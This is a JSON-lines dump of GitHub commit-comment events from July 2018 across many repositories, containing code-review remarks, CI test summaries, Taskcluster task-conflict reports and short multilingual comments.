{"id":"7999112568","type":"CommitCommentEvent","actor":{"login":"AzZureman"},"repo":{"name":"alexnester94/smartSoftTask"},"payload":{"comment":{"id":29789751,"position":6,"line":6,"path":"src/main/java/ru/nesteria/db/dbFunctions/DBActions.java","commit_id":"0f6264d1d3c0d7c672e2fc25268f68ecb912c995","created_at":"2018-07-21T19:53:00Z","updated_at":"2018-07-21T19:53:00Z","author_association":"NONE","body":"Так же, она должна быть с модификатором final\r\nИ, зачем она, если ты ее не используешь нигде?"}},"created_at":"2018-07-21T19:53:00Z"}
{"id":"7999114073","type":"CommitCommentEvent","actor":{"login":"Aaaa1zzzz"},"repo":{"name":"InterviewMap/InterviewMap"},"payload":{"comment":{"id":29789754,"position":8,"line":802,"path":"JS/JS-en.md","commit_id":"1d36d230bc4a436bec0fa9f1fb630044b33bafe3","created_at":"2018-07-21T19:54:12Z","updated_at":"2018-07-21T19:54:12Z","author_association":"NONE","body":"[Using_Doxygen_to_generate_Spanish_and_English_documentation.zip](https://github.com/InterviewMap/InterviewMap/files/2216449/Using_Doxygen_to_generate_Spanish_and_English_docum\r\n"}},"created_at":"2018-07-21T19:54:12Z"}
{"id":"7999114556","type":"CommitCommentEvent","actor":{"login":"Aaaa1zzzz"},"repo":{"name":"InterviewMap/InterviewMap"},"payload":{"comment":{"id":29789759,"position":null,"line":null,"path":null,"commit_id":"1d36d230bc4a436bec0fa9f1fb630044b33bafe3","created_at":"2018-07-21T19:54:35Z","updated_at":"2018-07-21T19:54:35Z","author_association":"NONE","body":"- [ ] \r\n\r\n- index.html"}},"created_at":"2018-07-21T19:54:35Z"}
{"id":"7999114950","type":"CommitCommentEvent","actor":{"login":"Aaaa1zzzz"},"repo":{"name":"InterviewMap/InterviewMap"},"payload":{"comment":{"id":29789760,"position":null,"line":null,"path":null,"commit_id":"1d36d230bc4a436bec0fa9f1fb630044b33bafe3","created_at":"2018-07-21T19:54:56Z","updated_at":"2018-07-21T19:54:56Z","author_association":"NONE","body":"[100.zip](https://github.com/InterviewMap/InterviewMap/files/2216450/100.zip)\r\n[MQL5.zip](https://github.com/InterviewMap/InterviewMap/files/2216451/MQL5.zip)\r\n"}},"created_at":"2018-07-21T19:54:56Z"}
{"id":"7999117776","type":"CommitCommentEvent","actor":{"login":"someblu"},"repo":{"name":"fang2hou/ElvUI_WindTools"},"payload":{"comment":{"id":29789763,"position":null,"line":null,"path":null,"commit_id":"62d8358607cd26fafcddcf8f1b6990902310bf51","created_at":"2018-07-21T19:57:14Z","updated_at":"2018-07-21T19:57:14Z","author_association":"COLLABORATOR","body":"新的客户端更新中， GetQuestsForPlayerByMapID() 的返回结果有了变化，questID需改名为questId"}},"created_at":"2018-07-21T19:57:14Z"}
{"id":"7999119521","type":"CommitCommentEvent","actor":{"login":"NeverPire"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29789764,"position":null,"line":null,"path":null,"commit_id":"b32a4837db98338aedcd22e4a188b3aa08995228","created_at":"2018-07-21T19:58:44Z","updated_at":"2018-07-21T19:58:44Z","author_association":"CONTRIBUTOR","body":"Merci b606, je n'avais pas réalisé."}},"created_at":"2018-07-21T19:58:44Z"}
{"id":"7999119648","type":"CommitCommentEvent","actor":{"login":"mariogamer2"},"repo":{"name":"libretro/Lakka-LibreELEC"},"payload":{"comment":{"id":29789765,"position":null,"line":null,"path":null,"commit_id":"ddff7a1f42ddf56781c6c1eda9983f44087e3b32","created_at":"2018-07-21T19:58:50Z","updated_at":"2018-07-21T19:58:50Z","author_association":"NONE","body":"I don't know if this is a real issue and/or must be on libretro side."}},"created_at":"2018-07-21T19:58:50Z"}
{"id":"7999120328","type":"CommitCommentEvent","actor":{"login":"NeverPire"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29789767,"position":null,"line":null,"path":null,"commit_id":"c3a2bebde0235a92824a3311081a643f902093bf","created_at":"2018-07-21T19:59:26Z","updated_at":"2018-07-21T19:59:26Z","author_association":"CONTRIBUTOR","body":"Je sens que ça va nous donner du travail tout ça."}},"created_at":"2018-07-21T19:59:26Z"}
{"id":"7997851435","type":"CommitCommentEvent","actor":{"login":"RafaQC"},"repo":{"name":"Luso233/TrabajoEnEquipo"},"payload":{"comment":{"id":29786578,"position":null,"line":null,"path":null,"commit_id":"808901393f5b55274b9d62528ca88d6773678e09","created_at":"2018-07-21T02:00:30Z","updated_at":"2018-07-21T02:00:30Z","author_association":"COLLABORATOR","body":"Estoy comentando en mi propio commit A__A"}},"created_at":"2018-07-21T02:00:30Z"}
{"id":"7997852624","type":"CommitCommentEvent","actor":{"login":"wilsondonizetti"},"repo":{"name":"wilsondonizetti/frontend-tcc"},"payload":{"comment":{"id":29786579,"position":null,"line":null,"path":null,"commit_id":"0e1947e6659c0ee7669b2b0888f27ca97ff4b455","created_at":"2018-07-21T02:01:17Z","updated_at":"2018-07-21T02:01:17Z","author_association":"OWNER","body":"."}},"created_at":"2018-07-21T02:01:17Z"}
{"id":"7997854021","type":"CommitCommentEvent","actor":{"login":"leyanki"},"repo":{"name":"leyanki/test_git"},"payload":{"comment":{"id":29786583,"position":3,"line":3,"path":"README.md","commit_id":"45d7abe9d1ea6510d59d86280ab532137d0c92f7","created_at":"2018-07-21T02:02:19Z","updated_at":"2018-07-21T02:02:19Z","author_association":"OWNER","body":"ajout d'information"}},"created_at":"2018-07-21T02:02:19Z"}
{"id":"7997854265","type":"CommitCommentEvent","actor":{"login":"carl-mastrangelo"},"repo":{"name":"grpc/grpc-java"},"payload":{"comment":{"id":29786584,"position":null,"line":null,"path":null,"commit_id":"146b6006b3cc003f68100d10da4ffce8225cc31d","created_at":"2018-07-21T02:02:32Z","updated_at":"2018-07-21T02:02:32Z","author_association":"MEMBER","body":"@LIULi-VVET Are you using the latest git repo (1.15.0-SNAPSHOT) ?   I don't think the annotation has been released in a Maven Artifact yet"}},"created_at":"2018-07-21T02:02:32Z"}
{"id":"7997854923","type":"CommitCommentEvent","actor":{"login":"leyanki"},"repo":{"name":"leyanki/test_git"},"payload":{"comment":{"id":29786587,"position":null,"line":null,"path":null,"commit_id":"45d7abe9d1ea6510d59d86280ab532137d0c92f7","created_at":"2018-07-21T02:03:03Z","updated_at":"2018-07-21T02:03:03Z","author_association":"OWNER","body":"add more information"}},"created_at":"2018-07-21T02:03:03Z"}
{"id":"7997855974","type":"CommitCommentEvent","actor":{"login":"sawgoodx"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29786589,"position":null,"line":null,"path":null,"commit_id":"31e652dbd25ffe42c71191fd44cff07216c41b72","created_at":"2018-07-21T02:03:50Z","updated_at":"2018-07-21T02:03:50Z","author_association":"NONE","body":"Thank you as always 👍 "}},"created_at":"2018-07-21T02:03:50Z"}
{"id":"7997862943","type":"CommitCommentEvent","actor":{"login":"ryjones"},"repo":{"name":"hyperledger/fabric-samples"},"payload":{"comment":{"id":29786606,"position":null,"line":null,"path":null,"commit_id":"dd12f88dc0d48b44b799b3a223b2b6a581fb78f7","created_at":"2018-07-21T02:09:17Z","updated_at":"2018-07-21T02:09:17Z","author_association":"MEMBER","body":"Thanks for the contribution! this is a read-only mirror. please read the [contribution guide]().\r\n\r\nThanks for the contribution! However, this is a read-only mirror. please read the [contribution guide](http://hyperledger-fabric.readthedocs.io/en/release-1.1/CONTRIBUTING.html). Also, feel free to join us on [chat!](https://chat.hyperledger.org/channel/fabric)"}},"created_at":"2018-07-21T02:09:17Z"}
{"id":"7997864901","type":"CommitCommentEvent","actor":{"login":"aahil30060"},"repo":{"name":"lebseu/iam"},"payload":{"comment":{"id":29786611,"position":8,"line":8,"path":"images/locked.svg","commit_id":"7d00d8150e96c5159c618e592b8ea5fc818fa6c2","created_at":"2018-07-21T02:10:53Z","updated_at":"2018-07-21T02:10:53Z","author_association":"NONE","body":"Unlock "}},"created_at":"2018-07-21T02:10:53Z"}
{"id":"7997867025","type":"CommitCommentEvent","actor":{"login":"jason2000915"},"repo":{"name":"FQrabbit/SSTap-Rule"},"payload":{"comment":{"id":29786617,"position":null,"line":null,"path":null,"commit_id":"8e73499afa87d6f761f59aba1fd3f969b737b39c","created_at":"2018-07-21T02:12:38Z","updated_at":"2018-07-21T02:12:38Z","author_association":"NONE","body":"更新国内IP数据库"}},"created_at":"2018-07-21T02:12:38Z"}
{"id":"7997867899","type":"CommitCommentEvent","actor":{"login":"mssun"},"repo":{"name":"mesalock-linux/mesabox"},"payload":{"comment":{"id":29786618,"position":null,"line":null,"path":null,"commit_id":"7729fb6b0aa07e4bce2c6064a2efb753c3040cd7","created_at":"2018-07-21T02:13:24Z","updated_at":"2018-07-21T02:13:24Z","author_association":"MEMBER","body":"Do you think testing on a previous stable version is necessary? Or we can just keep track of the latest stable for now, since Rust is involving and brings in new exciting features."}},"created_at":"2018-07-21T02:13:24Z"}
{"id":"7997867969","type":"CommitCommentEvent","actor":{"login":"LIULi-VVET"},"repo":{"name":"grpc/grpc-java"},"payload":{"comment":{"id":29786619,"position":null,"line":null,"path":null,"commit_id":"146b6006b3cc003f68100d10da4ffce8225cc31d","created_at":"2018-07-21T02:13:27Z","updated_at":"2018-07-21T02:13:27Z","author_association":"NONE","body":"I checked that most of the jars were not found."}},"created_at":"2018-07-21T02:13:27Z"}
{"id":"7997868349","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29786620,"position":null,"line":null,"path":null,"commit_id":"6cd6873cf7f4077a8cb37d27813c4526abe7b4c5","created_at":"2018-07-21T02:13:50Z","updated_at":"2018-07-21T02:13:50Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (2408 of 2978 tests passed, 57 test warnings)\n\nMessages:\n\n * 627 tests had: EIO diffs.\n * 566 tests had: Table big diffs.\n * 77 tests had: ESO big diffs.\n * 100 tests had: AUD diffs.\n * 167 tests had: ESO small diffs.\n * 101 tests had: MTR small diffs.\n * 35 tests had: MTR big diffs.\n * 17 tests had: ERR diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 73\n * Failed: 570\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.86%25-red.png)</a> \n"}},"created_at":"2018-07-21T02:13:50Z"}
{"id":"7997868455","type":"CommitCommentEvent","actor":{"login":"pcbaldwin"},"repo":{"name":"WikiSuite/openfire"},"payload":{"comment":{"id":29786621,"position":null,"line":null,"path":null,"commit_id":"55bceae81d42646983a159dfbf08af121a102fb8","created_at":"2018-07-21T02:13:56Z","updated_at":"2018-07-21T02:13:56Z","author_association":"MEMBER","body":"Nudged.\r\n\r\nThe move to GitLab turned a semi-automated build process into a manual process.  The ClearCenter build manager has left it up to 3rd party app developers to create automation tools.  So, we'll have to create some kind of [GitHub Webhook](https://developer.github.com/webhooks/) to automate the process.  The wheels are already in motion!"}},"created_at":"2018-07-21T02:13:56Z"}
{"id":"7997870535","type":"CommitCommentEvent","actor":{"login":"huapox"},"repo":{"name":"dewey-its/apollo-custom"},"payload":{"comment":{"id":29786626,"position":null,"line":null,"path":null,"commit_id":"42f2f0f9ecc0acc4461bbdddca03e7308a2367b5","created_at":"2018-07-21T02:15:33Z","updated_at":"2018-07-21T02:15:33Z","author_association":"NONE","body":"001"}},"created_at":"2018-07-21T02:15:33Z"}
{"id":"7997870976","type":"CommitCommentEvent","actor":{"login":"LIULi-VVET"},"repo":{"name":"grpc/grpc-java"},"payload":{"comment":{"id":29786629,"position":null,"line":null,"path":null,"commit_id":"146b6006b3cc003f68100d10da4ffce8225cc31d","created_at":"2018-07-21T02:15:56Z","updated_at":"2018-07-21T02:15:56Z","author_association":"NONE","body":"So I temporarily put it in the project as a java file.\r\nThank you."}},"created_at":"2018-07-21T02:15:56Z"}
{"id":"7997873758","type":"CommitCommentEvent","actor":{"login":"plusun"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29786632,"position":null,"line":null,"path":null,"commit_id":"74bc15fcf31878278cb8f8281a1bbde843e6ae1c","created_at":"2018-07-21T02:18:14Z","updated_at":"2018-07-21T02:18:14Z","author_association":"OWNER","body":"Where are the 1400 reported crashes? If you mean the cases under the \"input\", I should say that they are not crashes. These inputs are reserved as a fuzzing history so that everyone can continue fuzzing it based on it. Only the cases under \"bug\" are real bugs/crashes."}},"created_at":"2018-07-21T02:18:14Z"}
{"id":"7997874047","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29786634,"position":null,"line":null,"path":null,"commit_id":"6cd6873cf7f4077a8cb37d27813c4526abe7b4c5","created_at":"2018-07-21T02:18:29Z","updated_at":"2018-07-21T02:18:29Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6cd6873cf7f4077a8cb37d27813c4526abe7b4c5-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-21T02:18:29Z"}
{"id":"7997875189","type":"CommitCommentEvent","actor":{"login":"imjoey"},"repo":{"name":"sinokylin/terraform-provider-ovirt"},"payload":{"comment":{"id":29786636,"position":null,"line":null,"path":null,"commit_id":"a98b3cf7482249e7339371a10c4c300662e1a9f9","created_at":"2018-07-21T02:19:32Z","updated_at":"2018-07-21T02:19:32Z","author_association":"NONE","body":"@bmanojlovic  PR #30 adopts `dep` and adds dependencies into `vendor/` directory."}},"created_at":"2018-07-21T02:19:32Z"}
{"id":"7997875566","type":"CommitCommentEvent","actor":{"login":"sam31415"},"repo":{"name":"enigmampc/catalyst"},"payload":{"comment":{"id":29786638,"position":null,"line":null,"path":null,"commit_id":"1f83c45b277d2f5122abfcd53d0b9a89df069e77","created_at":"2018-07-21T02:19:51Z","updated_at":"2018-07-21T02:19:51Z","author_association":"NONE","body":"My mistake, this change doesn't break existing algorithms because the argument of the `set_slippage` function in `exchange_algorithm.py` is still `spread`, fortunately. "}},"created_at":"2018-07-21T02:19:51Z"}
{"id":"7997876285","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29786639,"position":null,"line":null,"path":null,"commit_id":"84926cd6457df04ce3826cd585a27cecf99291b3","created_at":"2018-07-21T02:20:26Z","updated_at":"2018-07-21T02:20:26Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-MacOS-10.9-clang: OK (2938 of 2943 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * SEGFAULT: 1\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\nZoneUnitarySystemTest Test Summary\n * Passed: 7\n * SEGFAULT: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.png)</a> \n"}},"created_at":"2018-07-21T02:20:26Z"}
{"id":"7997877123","type":"CommitCommentEvent","actor":{"login":"taoyouxian"},"repo":{"name":"hyperledger/fabric-samples"},"payload":{"comment":{"id":29786640,"position":null,"line":null,"path":null,"commit_id":"dd12f88dc0d48b44b799b3a223b2b6a581fb78f7","created_at":"2018-07-21T02:21:07Z","updated_at":"2018-07-21T02:21:07Z","author_association":"NONE","body":"Thanks for your reply, great! taoyouxian 邮箱：taoyouxian@aliyun.com 签名由 网易邮箱大师 定制 On 07/21/2018 10:09, Ry Jones wrote: Thanks for the contribution! this is a read-only mirror. please read the contribution guide. Thanks for the contribution! However, this is a read-only mirror. please read the contribution guide. Also, feel free to join us on chat! — You are receiving this because you commented. Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-21T02:21:07Z"}
{"id":"7997877679","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29786641,"position":null,"line":null,"path":null,"commit_id":"65744ffec8cd7805b72ea16872d9d2fc83824d04","created_at":"2018-07-21T02:21:34Z","updated_at":"2018-07-21T02:21:34Z","author_association":"NONE","body":"I had a patch a while ago that scaled mobility squares (more points for forward mobility).  I wanted to do a point per square * the rank that square is on, but the changes got too much and I gave up.  This would ultimately place less value on back rank mobility and MORE value on mobility for forward ranks.  I have no idea if it's any good or not, but I just thought I'd share."}},"created_at":"2018-07-21T02:21:34Z"}
{"id":"7997887266","type":"CommitCommentEvent","actor":{"login":"mssun"},"repo":{"name":"mesalock-linux/mesabox"},"payload":{"comment":{"id":29786654,"position":null,"line":null,"path":null,"commit_id":"7729fb6b0aa07e4bce2c6064a2efb753c3040cd7","created_at":"2018-07-21T02:29:38Z","updated_at":"2018-07-21T02:29:38Z","author_association":"MEMBER","body":"OK, let's stick to 1.26.2 for now and then upgrade when major features is needed. "}},"created_at":"2018-07-21T02:29:38Z"}
{"id":"7997887678","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"taskcluster/taskcluster-cli"},"payload":{"comment":{"id":29786655,"position":null,"line":null,"path":null,"commit_id":"4af2fd71e09effd52fd0897755fd56e8213dc221","created_at":"2018-07-21T02:29:59Z","updated_at":"2018-07-21T02:29:59Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\ntaskId eWvyKCO8TemwMnkuJtkg6g already used by another task.\nThis could be the result of faulty idempotency!\nExisting task definition was:\n ```js\n{\n  \"provisionerId\": \"aws-provisioner-v1\",\n  \"workerType\": \"github-worker\",\n  \"schedulerId\": \"taskcluster-github\",\n  \"taskGroupId\": \"HxxlR-TpTjuA_zOAXbb_HA\",\n  \"dependencies\": [],\n  \"requires\": \"all-completed\",\n  \"routes\": [],\n  \"priority\": \"lowest\",\n  \"retries\": 5,\n  \"created\": \"2018-07-21T02:29:58.818Z\",\n  \"deadline\": \"2018-07-21T03:29:58.818Z\",\n  \"expires\": \"2019-07-21T03:29:58.818Z\",\n  \"scopes\": [],\n  \"payload\": {\n    \"maxRunTime\": 3600,\n    \"image\": \"golang:1.8\",\n    \"command\": [\n      \"/bin/bash\",\n      \"-c\",\n      \"mkdir -p  /go/src/github.com/taskcluster/taskcluster-cli && cd  /go/src/github.com/taskcluster/taskcluster-cli && git init && git fetch git://github.com/owlishDeveloper/taskcluster-cli.git bug1476856 && git checkout 4af2fd71e09effd52fd0897755fd56e8213dc221 && make test\"\n    ],\n    \"artifacts\": {\n      \"public/taskcluster-linux\": null,\n      \"path\": \"/go/src/github.com/taskcluster/taskcluster-cli/taskcluster\",\n      \"type\": \"file\"\n    }\n  },\n  \"metadata\": {\n    \"name\": \"TaskCluster GitHub Lint Checks\",\n    \"description\": \"Linting\",\n    \"owner\": \"owlishDeveloper@users.noreply.github.com\",\n    \"source\": \"https://api.github.com/repos/taskcluster/taskcluster-cli\"\n  },\n  \"tags\": {},\n  \"extra\": {}\n}\n```\nThis request tried to define:\n ```js\n{\n  \"provisionerId\": \"aws-provisioner-v1\",\n  \"workerType\": \"github-worker\",\n  \"created\": \"2018-07-21T02:29:58.818Z\",\n  \"deadline\": \"2018-07-21T03:29:58.818Z\",\n  \"payload\": {\n    \"maxRunTime\": 3600,\n    \"image\": \"golang:1.8\",\n    \"command\": [\n      \"/bin/bash\",\n      \"-c\",\n      \"mkdir -p  /go/src/github.com/taskcluster/taskcluster-cli && cd  /go/src/github.com/taskcluster/taskcluster-cli && git init && git fetch git://github.com/owlishDeveloper/taskcluster-cli.git bug1476856 && git checkout 4af2fd71e09effd52fd0897755fd56e8213dc221 && make lint\"\n    ]\n  },\n  \"metadata\": {\n    \"name\": \"TaskCluster GitHub Lint Checks\",\n    \"description\": \"Linting\",\n    \"owner\": \"owlishDeveloper@users.noreply.github.com\",\n    \"source\": \"https://api.github.com/repos/taskcluster/taskcluster-cli\"\n  },\n  \"taskGroupId\": \"HxxlR-TpTjuA_zOAXbb_HA\",\n  \"schedulerId\": \"taskcluster-github\",\n  \"dependencies\": [],\n  \"requires\": \"all-completed\",\n  \"routes\": [],\n  \"priority\": \"lowest\",\n  \"retries\": 5,\n  \"scopes\": [],\n  \"tags\": {},\n  \"extra\": {},\n  \"expires\": \"2019-07-21T03:29:58.818Z\"\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  RequestConflict\n* statusCode: 409\n* time:       2018-07-21T02:29:59.813Z\n\n</details>"}},"created_at":"2018-07-21T02:29:59Z"}
{"id":"7997888479","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29786660,"position":null,"line":null,"path":null,"commit_id":"3e44305d633e7c2bb3fb42f762b110bae92a5167","created_at":"2018-07-21T02:30:32Z","updated_at":"2018-07-21T02:30:32Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.07 |\n| `metadata_passing` |     1    |\n| `metadata_total`   |     1    |\n| `nodes_count`      |   782    |\n| `texts_passing`    |     1    |\n| `texts_total`      |     2    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   +13261 |\n\n## Units\n\n| Changed                                                   | Status   |\n|:----------------------------------------------------------|:---------|\n| `./data/tlg0655/tlg001/__cts__.xml`                       | New      |\n| `./data/tlg0655/tlg001/tlg0655.tlg001.perseus-grc2.xml`   | New      |\n| `./data/tlg0655/tlg001/tlg0655.tlg001.perseus-grc2jd.xml` | New      |\n| `./data/tlg0655/tlg001/__cts__.xml`                       | Passing  |\n| `./data/tlg0655/tlg001/tlg0655.tlg001.perseus-grc2.xml`   | Passing  |\n| `./data/tlg0655/tlg001/tlg0655.tlg001.perseus-grc2jd.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4482)*\n"}},"created_at":"2018-07-21T02:30:32Z"}
{"id":"7997888679","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29786661,"position":null,"line":null,"path":null,"commit_id":"74bc15fcf31878278cb8f8281a1bbde843e6ae1c","created_at":"2018-07-21T02:30:43Z","updated_at":"2018-07-21T02:30:43Z","author_association":"COLLABORATOR","body":"My mistake. I've estimated the number of new files."}},"created_at":"2018-07-21T02:30:43Z"}
{"id":"7997891916","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"taskcluster/taskcluster-cli"},"payload":{"comment":{"id":29786669,"position":null,"line":null,"path":null,"commit_id":"6e46523129a7ffc29108acf0fc81135fbddf7747","created_at":"2018-07-21T02:33:38Z","updated_at":"2018-07-21T02:33:38Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\ntaskId Nu9CK0a-RHOsAHTMAlclHA already used by another task.\nThis could be the result of faulty idempotency!\nExisting task definition was:\n ```js\n{\n  \"provisionerId\": \"aws-provisioner-v1\",\n  \"workerType\": \"github-worker\",\n  \"schedulerId\": \"taskcluster-github\",\n  \"taskGroupId\": \"Ro5KHpj_QqCV_AoGTdqeRg\",\n  \"dependencies\": [],\n  \"requires\": \"all-completed\",\n  \"routes\": [],\n  \"priority\": \"lowest\",\n  \"retries\": 5,\n  \"created\": \"2018-07-21T02:33:37.246Z\",\n  \"deadline\": \"2018-07-21T03:33:37.246Z\",\n  \"expires\": \"2019-07-21T03:33:37.246Z\",\n  \"scopes\": [],\n  \"payload\": {\n    \"maxRunTime\": 3600,\n    \"image\": \"golang:1.8\",\n    \"command\": [\n      \"/bin/bash\",\n      \"-c\",\n      \"mkdir -p  /go/src/github.com/taskcluster/taskcluster-cli && cd  /go/src/github.com/taskcluster/taskcluster-cli && git init && git fetch git://github.com/owlishDeveloper/taskcluster-cli.git bug1476856 && git checkout 6e46523129a7ffc29108acf0fc81135fbddf7747 && make test\"\n    ],\n    \"artifacts\": {\n      \"public/taskcluster-linux\": null,\n      \"path\": \"/go/src/github.com/taskcluster/taskcluster-cli/taskcluster\",\n      \"type\": \"file\"\n    }\n  },\n  \"metadata\": {\n    \"name\": \"TaskCluster GitHub Lint Checks\",\n    \"description\": \"Linting\",\n    \"owner\": \"owlishDeveloper@users.noreply.github.com\",\n    \"source\": \"https://api.github.com/repos/taskcluster/taskcluster-cli\"\n  },\n  \"tags\": {},\n  \"extra\": {}\n}\n```\nThis request tried to define:\n ```js\n{\n  \"provisionerId\": \"aws-provisioner-v1\",\n  \"workerType\": \"github-worker\",\n  \"created\": \"2018-07-21T02:33:37.246Z\",\n  \"deadline\": \"2018-07-21T03:33:37.246Z\",\n  \"payload\": {\n    \"maxRunTime\": 3600,\n    \"image\": \"golang:1.8\",\n    \"command\": [\n      \"/bin/bash\",\n      \"-c\",\n      \"mkdir -p  /go/src/github.com/taskcluster/taskcluster-cli && cd  /go/src/github.com/taskcluster/taskcluster-cli && git init && git fetch git://github.com/owlishDeveloper/taskcluster-cli.git bug1476856 && git checkout 6e46523129a7ffc29108acf0fc81135fbddf7747 && make lint\"\n    ]\n  },\n  \"metadata\": {\n    \"name\": \"TaskCluster GitHub Lint Checks\",\n    \"description\": \"Linting\",\n    \"owner\": \"owlishDeveloper@users.noreply.github.com\",\n    \"source\": \"https://api.github.com/repos/taskcluster/taskcluster-cli\"\n  },\n  \"taskGroupId\": \"Ro5KHpj_QqCV_AoGTdqeRg\",\n  \"schedulerId\": \"taskcluster-github\",\n  \"dependencies\": [],\n  \"requires\": \"all-completed\",\n  \"routes\": [],\n  \"priority\": \"lowest\",\n  \"retries\": 5,\n  \"scopes\": [],\n  \"tags\": {},\n  \"extra\": {},\n  \"expires\": \"2019-07-21T03:33:37.246Z\"\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  RequestConflict\n* statusCode: 409\n* time:       2018-07-21T02:33:38.394Z\n\n</details>"}},"created_at":"2018-07-21T02:33:38Z"}
{"id":"7997894231","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29786672,"position":null,"line":null,"path":null,"commit_id":"74bc15fcf31878278cb8f8281a1bbde843e6ae1c","created_at":"2018-07-21T02:35:44Z","updated_at":"2018-07-21T02:35:44Z","author_association":"COLLABORATOR","body":"I was disoriented with the number of files."}},"created_at":"2018-07-21T02:35:44Z"}
{"id":"7997897507","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29786673,"position":9,"line":196,"path":"src/NUnitFramework/framework/Schemas/TestResult.xsd","commit_id":"28092fa19b0c0787cf7b65e565059f7bc11e52ed","created_at":"2018-07-21T02:38:43Z","updated_at":"2018-07-21T02:38:43Z","author_association":"MEMBER","body":"Sure, I guess it's misleading, although the docs have a slightly different purpose from the schema. Could be \"it is currently hard-coded as \"2\" but this should not be relied on\" but maybe dropping it is better.\r\n\r\nAs I follow this, I'm struck how big a deal it is to change from an XML fragment to an actual schema!"}},"created_at":"2018-07-21T02:38:43Z"}
{"id":"7997898603","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29786678,"position":9,"line":196,"path":"src/NUnitFramework/framework/Schemas/TestResult.xsd","commit_id":"28092fa19b0c0787cf7b65e565059f7bc11e52ed","created_at":"2018-07-21T02:39:47Z","updated_at":"2018-07-21T02:39:47Z","author_association":"MEMBER","body":"By \"slightly different purpose\" what I mean is that the specs tell you what to expect from NUnit, not what NUnit expects to get."}},"created_at":"2018-07-21T02:39:47Z"}
{"id":"7997900484","type":"CommitCommentEvent","actor":{"login":"taoliug"},"repo":{"name":"pulp-platform/ariane"},"payload":{"comment":{"id":29786681,"position":18,"line":293,"path":"src/csr_regfile.sv","commit_id":"cd1db48d14923924edde18e3b9f2efa2040e021f","created_at":"2018-07-21T02:41:24Z","updated_at":"2018-07-21T02:41:24Z","author_association":"NONE","body":"typo here? should be mstatus_q.mpp;"}},"created_at":"2018-07-21T02:41:24Z"}
{"id":"7997900855","type":"CommitCommentEvent","actor":{"login":"thok54"},"repo":{"name":"thok54/pagina-web"},"payload":{"comment":{"id":29786682,"position":null,"line":null,"path":null,"commit_id":"f2ff3c07547b48527effc734e2f778785203dd89","created_at":"2018-07-21T02:41:48Z","updated_at":"2018-07-21T02:41:48Z","author_association":"OWNER","body":"Esto es un comentario"}},"created_at":"2018-07-21T02:41:48Z"}
